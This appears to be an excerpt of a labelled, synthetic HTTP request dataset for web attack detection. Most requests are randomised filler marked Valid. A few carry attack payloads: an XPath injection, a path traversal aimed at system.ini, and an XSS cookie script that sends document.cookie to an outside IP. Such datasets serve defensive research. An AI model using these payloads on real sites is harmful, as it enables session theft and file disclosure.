Cookie: U2UFbKE6XU=t E
Cookie2: $Version="92"
Date: Wed, 18 Jul 07 17:41:55 UTC
ETag: "77kb4B5Tx-Kidlr"
Expect: o51lPsi=ojng4
From: 0hi6jdg@0eiMas.net
If-Modified-Since: Sat, 13 Jan 07 05:58:35 CET
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: "lmnFfJnF3JJUCEEPMm"
If-None-Match: *
If-Range: "zTYKTPttHO@V0Pepk"
Max-Forwards: 823
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM dG95ZXM0ZW1TbDVPZXRpckV0eW1haUF3Y3hjc3N4Y2V0dGVjb2k=
Authorization: Digest username="rtpsd0r"
Range: -1684
Referer: /etlslnnn/nht09/dfro/0psc/hLjaisot.jpeg
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: hruiFn/7.1.5.2.5
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1157x6904
Via: 0.9 119.32.120.102:46229, 4.8 www.Meyahd.css
Transfer-Encoding: deflate
Upgrade: adnta/2.9, tdea7/4.5, namtya/0.5, Oar/2.5, uhskt/9.4
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 400505966006
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25614
Start - Id: 16540
class: Valid
GET /rlhaiutconFrln9onEEy/9z9XYd/nFEojShf22UoWto/sAUYo3/_q/eu1lfnR6enslR/no3us/eQc1GQ-kzy5jLR/muwho4a5asecaeatu1q.asmx? HTTP/1.1
Host: 162.135.94.104
Connection: eit4hnnj
Accept: audio/x-wav;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.0, deflate
Accept-Language: l-m;q=0.3, rqE-Z, iaaen-snlepx5S;q=0.9, 6xp8i-aiynn
Cache-Control: only-if-cached
Client-ip: 80.111.89.60
Cookie: amomeutsvoior=131;fhai=sQF2IAT;tn=29696237;umn=30572370
Cookie2: $Version="85"
Date: Wed, 06 May 09 03:51:05 UTC
ETag: W/"zVnKeDH.VwKLyfrA"
Expect: 6otl
From: 76ee@Emufnodv.uk
If-Modified-Since: Sun, 20 Sep 09 19:10:38 CET
If-Unmodified-Since: Fri, 11 Sep 09 21:54:46 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Aug 06 06:23:48 UTC
Max-Forwards: 4
MIME-Version: 1.2
Pragma: tmotuh=c
Proxy-Authorization: NTLM dHluaGlhcnVsc2FudWxBSWFEdWVlTHNyYWZtM3MyY2lSZWhvY2RobnI0bDFlbGl0
Authorization: Basic aXoxb2lUcjplU2Q1dA==
Range: 53-224,9424-27
Referer: http://eEdo.de/qkfg/aa1ue/iOrd6s/oor5y/sHnttTiL.jsp
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/4.2 (compatible; MSIE 0.0; Linux i586; sxerrel8; hsfimemma; dtMpeq)
UA-CPU: MIPS
UA-Disp: 439,238,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 599x133
Via: eiaafs/2.4 www.y7go.html, FTP/6.6 126.99.244.204, 9.4 220.113.109.117
Transfer-Encoding: gzip
Upgrade: dst8ln/4.3, ctAuo/5.0
Warning: 574 www.ragnqoh.htm "mte2te" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 05592727151
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16540
Start - Id: 13073
class: Valid
GET /redeyid3aemeetnshx/dRNkjsQD8ngKU/Ameo0P/sn/ylscriptEvJ9iaMhtaccesAT/fnesayemihlqITmu/znzno1@4hBixi/JcHtYXrmRservices_tZSS.cfm?qo=abinzqnnto+ia%40uoiu2Sz&cqSk5SEC0Y=+riecholi4+c&TFgGnetcatVtQr=09213195&uysglmtuhUlb5tt=sz0y1H7&5NM7LdBKf=69&4eAFPXL@winntf=78881378&tbjLmSULwdoet=fexecela&rIpMtnhns=pd&nyt=6653144&irtsnm=65&nfr5sari=8 HTTP/1.0
Host: 21.110.52.82
Connection: iyttnoee
Accept: */*;q=0.3
Accept-Charset: ks_c_5601-1987;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: re3dhme-nie3kee, s9mpfl-enimss;q=0.7, ld-Ctpamy;q=0.7
Cache-Control: min-fresh=62268
Client-ip: 81.49.118.93
Cookie: SfcYOsrjXB.F=rtelnetf7document/8tore;E7fmmrcp=i$8pwglsyDi;O5sE=iwO627;0KAUYHlo=:mtmn/v<htxp2;tat=Nw3eepoe7w fifnt;noitfRmpoeuAg=91487
Cookie2: $Version="333"
Date: Fri, 19 Mar 04 16:27:31 CET
ETag: "lgqCvTweL83alXodx"
Expect: u8tnes=no6T;oeiI5=dw7e
From: tnhi4hE@9okqw9h.it
If-Modified-Since: Sun, 11 Sep 05 09:16:47 CET
If-Unmodified-Since: Wed, 17 Sep 08 03:23:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4756
MIME-Version: 1.2
Pragma: l='reA'
Proxy-Authorization: E3lea ckerR=rgYuo
Authorization: engcre seiObce=fRdEzpu
Range: 65780-,3-830,6-864
Referer: http://fl1ieawo.gov/gxm7a/lbsq9/ddYoa/ieAoe/lahz.mspx
TE: gzip,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/0.2 (Machintosh; U; Mac OS X 6.7; re-on; rv:6.6.1) Gecko/68756600
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 880x583
Via: FTP/4.3 www.naadlloy.tiff, HTTP/7.6 www.rleue.gif, 2.2 79.67.238.145
Transfer-Encoding: deflate
Upgrade: s5iqnh/8.3, kyo/5.0
Warning: 640 www.1louxUcH.gif:02024 "htiLue4k" "Tue, 30 Oct 07 05:54:05 GMT"
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13073
Start - Id: 49349
class: XPathInjection
GET /tasMetq9ehAshRt/r11weeaYteoontyne/oZKS1oW6ep/Cc59/AI/e9h5odd.l.nsf?processing-instructionaps5Pl3likeIi=oaiqcrittBmeqwto&re=6585623&WevaldL1Y=644+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++648%3D&seythmeto5Hi=EP8e&wyhdSehl=5&pkh=%2FDu&rhtRnroh=fsock_streamvd-+riealari%3Eeo%24b&thf8Doymnai=metaevn%5D%26%3F%3F%3A+t%2Baee+R&ee=753&6bt=nayexoeotnnhrchean&ify=%7C&txeEhppia5ela=731&Stmp_1hEI7l=7&lntoel8=2464422 HTTP/1.0
Host: 84.36.163.203
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 144.73.134.163
Cookie: osedsihricDh3r=aooene&nr;etrengotaderhsi=rceVmEJO;SetiTierrgh=Di2d7i3Mnpa
Cookie2: $Version="415"
Date: Sun, 26 Nov 06 20:40:47 GMT
ETag: "BrVgUNrCZpWEqF@yQF"
Expect: nteo1rm=hlxEErme
From: EgerC@tafwi.com
If-Modified-Since: Sun, 15 Apr 07 11:09:53 CET
If-Unmodified-Since: Mon, 08 Jan 07 05:12:31 CET
If-Match: "vHRE9ntj6V3r_1DGgcJk"
If-None-Match: "s4JD3HVD3q6xRtR"
If-Range: "uXLagBPd6tx@WL.hE"
Max-Forwards: 4
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: paIta yEnolhc=1srhn
Range: 50519-,-46393
Referer: http://ez7mt.com/yaira/ahfhsi/tYlyepoc/at2Ntnnl.pdf
TE: deflate,gzip
Trailer: Upgrade
User-Agent: Mozilla/6.1 (Windows; U; WinNT 6.7; wi-oo; rv:3.5.1) Gecko/37424354
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x2070
Via: gea/8.9 www.ne5nnEtd.htm, 3.2 www.intn.gif, 9.5 www.h2oe.tiff
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49349
Start - Id: 36167
class: PathTransversal
GET /rvBdKVdA/sqOYmL_CrP/mnS/HTQiumdjMn/Oeio0o/ohtpassBmaE/et4c@2V9y3VF45bE5/nesrjq/lOnkl/RZWgMt@x..dll?IandH6=rwIixw&VstylencXecI=..........................WINNTsystem.ini HTTP/1.0
Host: www.eoalhikin.st
Connection: close
Accept: text/plain, audio/*, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.7
Cache-Control: 2s4eh=ie
Client-ip: 219.216.59.226
Cookie: ddnqtAhtmauphpa=bt;cyoe1maddtaimr=(h/ealysdeconnect1;rek5r898d=116387;tipoxdtr=conh
Cookie2: $Version="892"
Date: Thu, 24 Sep 09 19:33:03 UTC
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Sat, 22 Nov 08 19:07:18 UTC
If-Unmodified-Since: Sat, 27 Dec 08 13:05:03 CET
If-Match: "Ga7mUDlwtBviTIW-Q"
If-None-Match: *
If-Range: *
Max-Forwards: 16
Pragma: teteoR7b='ieeRBnn'
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: http://uaepde.net/hw0vov/o2io10tp/edsma.css
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.2 (compatible; MSIE 7.4; Unix; tine)
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 42.90.242.122
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36167
Start - Id: 28879
class: Valid
GET /Stw7ls2C3/rT5FKV_3T6m/hprTABYR/hWJZhh9Btr.ZBNRsuy9w/caya/pnJ5Gbwhere6M/r@6_jnjbc/aAls/eu1yugpfAp5As/lrc/thj.shtml?espuerl=36756&woihhc=yxa&mnie=r1AacN&7eil4rae=1 HTTP/1.0
Host: 40.10.55.251
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: pvliwn-oiehnru;q=0.9, d-soar, lreosJbt-stelcgh;q=0.5, 6o4etE-i;q=0.9, Sbf-tour3;q=0.2
Cache-Control: Z1it=h
Client-ip: 184.178.162.162
Cookie: sjofvyfa4gt9e3f=roueor;ii4Nar=@e;nt3Shs9aSpgA=d4s?eq5oAformnlhI;Lbroteewlje=cecsjis
Cookie2: $Version="60"
Date: Mon, 26 Jul 04 19:52:49 GMT
ETag: W/"fnIzkzenlXik_tIzb@T"
Expect: 0soj
From: 4zbw@syof.net
If-Modified-Since: Fri, 09 Jul 04 03:57:46 CET
If-Unmodified-Since: Tue, 25 Sep 07 12:10:17 UTC
If-Match: ".YPgJ4h_eLX5Osv"
If-None-Match: "GepjJMfN-_IVRV1KiIxV"
If-Range: Sat, 07 Feb 09 18:10:46 UTC
Max-Forwards: 3317
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: odhct rsogisjd=sety7ma
Authorization: Digest nc=cD1Eb6A5
Range: 0-78,-19014
Referer: /cesate/ek6psba/1c8s93te/xega7.htm
TE: gzip,trailers
Trailer: Warning
User-Agent: Mozilla/7.6 (Windows; U; WinNT 8.2; et-rb; rv:3.9.0) Gecko/10608229
UA-CPU: x86
UA-Disp: 246,885,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: 0.8 www.Oeer.htm:58, HTTP/4.5 www.shOttt.htm:1785, 3qju/5.2 www.pfse.jpeg
Transfer-Encoding: deflate
Upgrade: Heaaio/3.3, roeeIt/7.8, gaane/0.2, iti/4.2, eof/1.2
Warning: 683 133.125.37.48 "2t0sroNh62q" 
X-Forwarded-For: 149.164.161.105
X-Serial-Number: 687925565922143
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28879
Start - Id: 13586
class: Valid
GET /4gki1F2F0l_FyUreWNq/D8ecr/ua.sh?P.U4=fdeletenitmochaelDj+%3DEh%40&Nrhspeea=Sujlthon&hltaHwulnq=101305&fmiLqaiewwoVty=tdposition&Eacenhe5rg=tcOz5q&e4lwb=+ HTTP/1.1
Host: www.eivvto.cz
Connection: fcenl6
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: mIrl-lii;q=0.0, a-tAi2oeEa;q=0.0, o-enM;q=0.8
Cache-Control: min-fresh=335
Client-ip: 134.203.218.183
Cookie: weo=zt:ie[j7e oweo wzu;1aouktriO=3;eihgta68h=ctan;oO08tts=83353;tid=heeh1bUNL(doincludeo7location;h457=twls0a
Cookie2: $Version="5"
Date: Sat, 03 Jan 09 01:35:28 CET
ETag: W/"g3IGG.-02FcXpJahULX"
Expect: sp4siceo
From: issst@tutqrpd.biz
If-Modified-Since: Tue, 08 Jan 08 01:58:43 GMT
If-Unmodified-Since: Sun, 03 Dec 06 11:02:10 CET
If-Match: "YcfbB-AqaOtwNjaP.n"
If-None-Match: *
If-Range: Mon, 24 Jul 06 11:02:28 GMT
Max-Forwards: 20
MIME-Version: 9.3
Pragma: rh='lei'
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: 6Idi Amtbh=wractidl
Range: 625-
Referer: http://www.1o2i0.org/ehrieas/4aia.png
TE: chunked,chunked
Trailer: If-Match
User-Agent: lfledrq (trAp8zmHCC)
UA-CPU: Sparc
UA-Disp: 896,6607,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: HTTP/9.3 18.152.214.92, 9.7 www.looOmuqr.html
Transfer-Encoding: identity
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 703 178.118.249.8 "oetetNse5t" "Tue, 31 Jan 06 07:52:19 UTC"
X-Forwarded-For: 170.190.112.43
X-Serial-Number: 70032554284651
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 13586
Start - Id: 15652
class: Valid
GET /neziscsiha7hrn9nlw/ssuZrimo/nts/es8eetVlty2meco2wees/sazidytuyn9enoCrpuyz/etrapndn0d/f3BZL@_.es/lJpBonCM.jpeg?hlonT=932&bi1ed=rue&8betweenmail@X=n8xd&nTlnzoScrot2etb=wq0TNpjw&p6in6kubltnoaeI=321186798&yvwhxauaoeanngk=323078988&ueeinhsUnoewxo=7520&QR8Q=9&SXvJ=uoRaare1ht1 HTTP/1.0
Host: www.cipcFcis.be
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 9.72.225.172
Cookie: ahlmvhlihtc=e&hb;8al0dnwstoie=5766552202
Cookie2: $Version="6"
Date: Mon, 19 Oct 09 21:46:56 CET
ETag: "bg6ooN88K@gpwH.ULdL"
Expect: os6bi=AtHottq;ytotu
From: enyentta@0oaremMh1h.cz
If-Modified-Since: Mon, 29 Mar 10 01:28:12 CET
If-Unmodified-Since: Thu, 26 Apr 07 20:27:59 CET
If-Match: *
If-None-Match: "svrb.ZOjz1KABN1My3ki"
If-Range: "2M3fVzfqokGYo_-"
Max-Forwards: 01
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: reai onoshDhe=eba1
Authorization: spo7 aot8ti=gN5twl8
Range: 4066-0881,3-
Referer: /telmtkt/rIypH/uPzAazi.css
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: eoee (ciz6sX; wcqv@A; hZW-__bQ)
UA-CPU: PowerPC
UA-Disp: 043,7183,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2296x8201
Via: 3.0 31.95.87.189
Transfer-Encoding: gzip
Upgrade: 6tin9m/2.5
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15652
Start - Id: 282
class: Valid
GET /pIsGYtdSPS8/efe4PchtnroR/rrsYdJ.5GTZN1fBO/tskt4FE/saExSwOvI@jD/cudftenaai7aitbujZly/leFqWE7Uwiphp6LphI/LENCDHJpassthruapDVK.gif?hN=xMtrkh&elwe=riI&iq2dEuwj=qAiyQzieam08h&lseaab5jtoijoow=sIu&H6bD.BFselectP96=nnasheo%40lCeaDwh&ebrgpht9nv=nsR&tee6er5om7pexqe=%24qb++cmn%3FnUrsswcetoinclude&updateYostyle=xaaioEaoawdhelts HTTP/1.1
Host: 139.111.241.107
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 120.251.90.4
Cookie: iuunIatse=eSewhere
Cookie2: $Version="132"
Date: Wed, 12 Mar 08 01:42:06 CET
ETag: W/"2Pf3JFfPFvROKYVb4Z"
Expect: m2us=iepgrRor;xhogaSse=snSLR
From: pwiyhge@ptiCb.uk
If-Modified-Since: Tue, 01 Jun 04 13:45:01 UTC
If-Unmodified-Since: Wed, 28 Apr 04 16:05:26 UTC
If-Match: "yvZuy-621M.I9.S."
If-None-Match: "Weq7wyY3N6_0vpp9vL9a"
If-Range: Mon, 05 Apr 04 13:27:00 UTC
Max-Forwards: 144
MIME-Version: 2.0
Pragma: da2o=i
Proxy-Authorization: uhsh btstd=hokplarr
Authorization: Basic dUE5SW5lOmd1MWFS
Range: 45-32,65908-442586,1566-181
Referer: http://www.ts1ls0l.gov/oftaeo/oiee/rhdebbc/eete2s/e3r1.sh
TE: chunked;q=0.0,trailers
Trailer: Expect
User-Agent: Mozilla/2.4 (X11; U; Linux i586 1.7; he-yt; rv:1.2.4) Gecko/61126670
UA-CPU: x86
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: 9.2 241.84.3.92, 8.2 209.56.3.92, 4.3 138.63.204.237
Transfer-Encoding: daxIdt
Upgrade: elstit/6.3
Warning: 810 www.D49Weeom.css "dfntshnsapbwoYde9r4" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 3817117496295
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 282
Start - Id: 48249
class: XSS
POST /sHnSFOn8qUquY/tH-PylnPQowWGVqdHr/UtnTvhAraioipds4/tuo4/o31H2Y6pf3zj9s0lg/wiee/cacceptk5mYhtaccesK9kl3/ttott1ehdsu/2qDkulr35@2eSeH.MD/hs.asp? HTTP/1.0
Content-Length: 131
Content-Language: G8i,eo4yh6i
Content-Encoding: compress
Content-Location: /j0edee/iCasayhi/lueN/3ehily/1a6n.fgf
Content-MD5: dHRhdENiaGFMZWtubWFldg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 09:12:44 CET
Last-Modified: Tue, 03 Nov 09 21:13:20 GMT
Host: www.oTeilmns.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 116.229.45.133
Cookie: sianreclrpsa=services;oigmyu7mocaI=<style    ><!--</style><script >[window.open('http://26.1.190.237/ge.jsp'+document.cookie);]//--></script    >
Cookie2: $Version="82"
Date: Wed, 07 Jun 06 14:11:54 GMT
ETag: "IL489W6ORGtxFWdhuw8"
Expect: isgtaee
From: leoau@ioycU5in.ch
If-Modified-Since: Mon, 17 Nov 08 21:43:37 CET
If-Unmodified-Since: Sat, 16 May 09 06:40:09 UTC
If-Match: "3mBTsRNbu4vNZIaoZt"
If-None-Match: *
If-Range: Wed, 30 May 07 18:06:50 GMT
Max-Forwards: 418
MIME-Version: 4.8
Pragma: geIp='pgt'
Proxy-Authorization: e5ifsn honefan=3imiar
Authorization: NTLM eWVjcjNuQmJsem1zdnRsRXN4dWE1dGVldHRldGlzYWVpQmlpYzQ=
Referer: /ly1ifh/nh0Onh/gri9h4.sh
TE: chunked,trailers
Trailer: Authorization
User-Agent: 1hStetrkbDiweatLljH
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9341x017
Via: HTTP/4.6 125.58.4.79:7629, FTP/5.7 www.smusscmo.jpeg, rtsgY/9.1 www.3uoael.htm
Transfer-Encoding: gzip
Upgrade: anpU/1.3, qtqiol/8.7, eiaeO/6.1
Warning: 204 221.243.76.123 "neosaayxsno" "Fri, 20 May 05 05:10:12 GMT"
X-Forwarded-For: 233.95.8.172
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

mlyxcrin=7f=res?riframetesmesg&eeiuzius=iqyttd&hresizoeao1nel=28&eAeh5tsSwral=utsdo&eihehwTmSmgyQim=3678701672&rbeehtdnaolrLl=6

End - Id: 48249
Start - Id: 24826
class: Valid
GET /hUsk3sqw7JYr3/awreoteruhedrd/cPb/@YmOD61oTphpS/wdBx73lkYuPrR2UqMcQ/Reweaeia6gfidat/Sr/asHt.php?WUDECo20=2%26lng0n%2B%3Fechowinnt%2Bbetween&lsepXoiyhn=Amastcltaenhersb7h&o8Tmsd6trr5=eoaVAahonhs5 HTTP/1.1
Host: www.cFeeusu5q.ch
Connection: close
Accept: text/*;q=0.0, text/*, application/zip
Accept-Charset: iso-8859-4
Accept-Encoding: gzip, identity, identity, deflate;q=0.7, compress;q=0.5
Accept-Language: nsTnr-ot;q=0.2, sm3-asq8dm;q=0.4, h-mis, hoxtni-rstnqH, lci-oc8mea
Cache-Control: max-stale
Client-ip: 63.224.181.72
Cookie: otlo=61216815;FIcn=nseoca;rmUK5M1=DmumnuhttpIndsoeqi;etdm2dtdtposrs=sCzqVX0KaOjM;-pkQVbinphpRhservicesX=f3JFBwk
Cookie2: $Version="951"
Date: Sat, 05 Aug 06 13:34:00 CET
ETag: W/"WPZIjKrEjvLm0ecB"
Expect: 100-continue
From: pg0kwiy@2weD8er.de
If-Modified-Since: Tue, 03 May 05 10:37:05 UTC
If-Unmodified-Since: Tue, 19 Dec 06 19:25:22 CET
If-Match: "6FqeipMbArQjJou"
If-None-Match: "D0aB7PqN31Ii95k"
If-Range: Mon, 04 Feb 08 16:47:27 UTC
Max-Forwards: 4
MIME-Version: 0.0
Pragma: ho=huviiEn
Proxy-Authorization: eavp 4smsS=trdyaIt
Authorization: Basic SEVldHV2ZTp5ZnNuZXc=
Range: 89-,-8
Referer: http://feusrivo.st/ia4bPR/hdio.tiff
TE: chunked;q=0.0,chunked;q=0.1
Trailer: Expect
User-Agent: o@6gAw5 http://www.abfo.biz
UA-CPU: x86
UA-Disp: 9323,238,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 577x412
Via: 4.7 www.mfso.js:614, FTP/3.5 217.212.26.66:715
Transfer-Encoding: compress
Upgrade: slnd/7.7, n2now4/3.0, 8Sk/4.7, tIrah8/3.8, Nnodwe/5.3
Warning: 185 www.aas8co.jpeg:420 "Njalea" 
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 2608938544154146397
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24826
Start - Id: 19457
class: Valid
GET /toZstdint5zVTQ/Seayta/oarsrIE.W/RdidLPftp/anxbKeByI7Yrd/a@R9jcdG7U3TvM/ezXJlzKP4o/iweeamdeoi7Ckpuo/u2jUNORw/uZng7@/nu/eDjwMmh0S.html?reinorfir9e=rehhxSa0&ehzgomet5ode=ivMtn8rcht8s&aiotmsewuaa=a0nHNho&irgEafetwchiNdd=aody5mHbOco+ei&alehhq=9046895 HTTP/1.1
Host: www.noEnee.cz
Connection: tNencvmj
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.0, gzip, gzip
Accept-Language: *;q=0.0
Cache-Control: rkeor='o5'
Client-ip: 101.98.75.185
Cookie: ft=1
Cookie2: $Version="7"
Date: Mon, 07 Dec 09 13:04:16 GMT
ETag: W/"-LPnKoFU5rJWK-a5Y."
Expect: eDioceT
From: iAorlael@65tgUr6o.st
If-Modified-Since: Tue, 28 Aug 07 20:54:01 CET
If-Unmodified-Since: Sun, 25 Apr 04 04:29:21 GMT
If-Match: "uKH7C7L623Wd1GaMW6"
If-None-Match: "d4vsJZX3F6hSZHga7xJ"
If-Range: Sat, 28 Jul 07 15:16:34 GMT
Max-Forwards: 9
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM dHVUckVoYWVlNnRvYWFubjI3N2Rlc25hbHdveWdkb0FzaThyRWloT2ZrSXlpaQ==
Authorization: Digest opaque="roeoyii"
Range: 8819-,9639-,-4094
Referer: http://www.1th2eRn.org/wmsnR/toduo82.mp3
TE: trailers
Trailer: Accept
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 2.6; ng-zp; rv:2.4.0) Gecko/64794027
UA-CPU: PowerPC
UA-Disp: 915,682,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6480x436
Via: FTP/7.1 183.106.63.141, 8.4 217.43.227.177
Transfer-Encoding: identity
Upgrade: gjSrb/4.9, dbii/3.0, slsOas/6.2
Warning: 449 www.ndet.css "sdhedesnesotsehavaiu" 
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 219251362727568
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19457
Start - Id: 26510
class: Valid
GET /t060srslh1tm5eo/nWxatjpedp/TldkssnIawI1/eLheel6nosoh4ai7lu.aspx?nstOfdedeni=htcr&eivNab=irrDsisel9nay&ici=aniteyw0tAhevt0&9o0eoinbrs=8&abd=%3Ddocument&siuayeil=psdel+Tecmdn HTTP/1.1
Host: 121.90.75.211
Connection: close
Accept: */*;q=0.7
Accept-Charset: koi8, iso-8859-15, x-mac-icelandic;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=47
Client-ip: 77.75.121.160
Cookie: BOopt9s=hR
Cookie2: $Version="9"
Date: Mon, 21 Mar 05 03:12:31 UTC
ETag: W/"Ng8Qe4jANXy2URS"
Expect: ofpnit
From: 4e5f4@aengr.net
If-Modified-Since: Mon, 08 Feb 10 24:37:17 UTC
If-Unmodified-Since: Wed, 05 May 10 22:47:46 GMT
If-Match: "I3PYQBj7Qo0QreH"
If-None-Match: *
If-Range: *
Max-Forwards: 2864
MIME-Version: 2.3
Pragma: ehtIha=0e
Proxy-Authorization: Digest username="oynAo"
Authorization: Eo0nh rhOmtoo=2hcade
Range: -51243,13953-
Referer: http://baa7A.it/ltslnhix/ng3ds/itps.asp
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: 0eooisnlyge
UA-CPU: MIPS
UA-Disp: 9620,0046,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 106x0303
Via: 9.9 www.i4nA.jpg, 2.7 154.234.203.246, tmcnOn/9.7 179.17.203.104
Transfer-Encoding: heqpki
Upgrade: erCd/6.1
Warning: 567 231.34.196.89 "orboinw2a8tum" "Sun, 15 Jul 07 19:11:52 GMT"
X-Forwarded-For: 251.182.204.109
X-Serial-Number: 8696612011
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26510
Start - Id: 955
class: Valid
GET /hC/ue/vipNye1vet1rsNa2aseo/isWm_RP9/56xemya2re2f/9ipBhletzua.asmx?17@X.gpz.I8=te&zFp4ie6=839102771&laiustngp5d8=%5C%3F&fhwoo=arz9c&PFftp5n@=v9pigasit HTTP/1.0
Host: 46.127.234.21
Connection: AbczH
Accept: video/*;q=0.0, audio/basic
Accept-Charset: iso-8859-5;q=0.6
Accept-Encoding: *
Accept-Language: 17yara-neipE;q=0.1
Cache-Control: no-store
Client-ip: 125.85.14.123
Cookie: h8eakeuuk0we5=9;ehdjsIN6aset=EiNdwnsAs3p
Cookie2: $Version="7"
Date: Tue, 17 Feb 09 06:57:04 CET
ETag: W/"nGeVxugnjpjlbqAbIA"
Expect: 100-continue
From: eielNb@taT0r.com
If-Modified-Since: Mon, 20 Dec 04 04:43:16 CET
If-Unmodified-Since: Tue, 17 May 05 22:26:48 CET
If-Match: *
If-None-Match: "3N.Rfg2QZ7n9y@_"
If-Range: Thu, 27 Jul 06 08:02:32 CET
Max-Forwards: 3
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.oan8.com/1alaeNs/ecNt3r/gaimg/LiucI.pl
Authorization: NTLM YWFiZXR3ZXlodGljbWFucHQ5ZWVodGRhbm56Mm9nWXZpb2tjbm5ldGR0ZXQ=
Range: 37-165,99813-448132
